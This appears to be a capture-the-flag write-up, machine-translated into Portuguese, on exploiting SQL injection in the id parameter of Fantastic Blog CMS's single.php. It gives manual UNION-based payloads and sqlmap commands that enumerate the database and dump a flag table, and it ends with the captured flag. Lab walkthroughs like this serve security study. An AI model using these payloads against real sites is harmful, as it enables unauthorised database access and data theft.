Índice
1. Tópico
introduzir:
Fantastic Blog (CMS) é um sistema de gerenciamento de conteúdo web absolutamente fantástico para blogs/artigos. Ele permite que você gerencie facilmente seu site ou blog e oferece uma ampla gama de recursos para personalizar seu blog de acordo com suas necessidades. Ele está repleto de recursos e você pode colocar seu blog em funcionamento sem tocar em uma única linha de código. No caminho /single.php deste CMS, há uma vulnerabilidade de injeção de SQL no parâmetro id.
/single.php O diretório oficial fornecido por mim não foi escaneado ou esgotado. . .
Acesso direto ao ip: http://xxx/single.php?id=1
id=1' erro: verifique se há uma vulnerabilidade de injeção de sql
Não há nada mais do que dois tipos de vulnerabilidades de injeção SQL:
1. Injeção manual 2.sqlmap
1. Injeção manual
http://xxx.com/single.php?id=1' and 1=2 union select 1,2,3,4,5,6,7,8,9 --+
ponto de injeção 2
Consulte a biblioteca atual:
http://eci-2zecserefv52em912u7k.cloudeci1.ichunqiu.com/single.php
?id=1' and 1=2 union select 1,database(),3,4,5,6,7,8,9 --+
Confira a tabela:
http://xxx.com/single.php
?id=1' and 1=2 union select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()limit 10,1 --+
tabela de bandeiras
Coluna de consulta:
http://xxx.com/single.php
?id=1' and 1=2 union select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_schema=database() and table_name='flag'limit 0,1 --+
Campos de consulta:
http://eci-2zecserefv52em912u7k.cloudeci1.ichunqiu.com/single.php
?id=1' and 1=2 union select 1,flag,3,4,5,6,7,8,9 from flag limit 0,1 --+
cair
2.sqlmap
Dois métodos:
Capture pacotes diretamente e grave-os em txt e execute diretamente
Você também pode explodir o URL e adicionar pontos de injeção
captura de pacote burp
Salvar em arquivo.txt
sqlmap um garanhão:
Biblioteca de explosão:
python sqlmap.py -l xxx.txt --batch -dbs //跑文件
python sqlmap.py -u http://xxx.com/single.php?id=1 --batch -dbs //跑url
A biblioteca ctf explodiu:
Explodir tabela ctf:
python sqlmap.py -l xxx.txt --batch -D "ctf" --tables
Explosão coluna falg:
python sqlmap.py -l xxx.txt --batch -D "ctf" -T "flag" --columns
Valor do campo de rajada:
python sqlmap.py -l xxx.txt --batch -D "ctf" -T "flag" -C "flag" --dump
bandeira{4448e436-7e63-4b52-85b9-5b9aa7bfc549}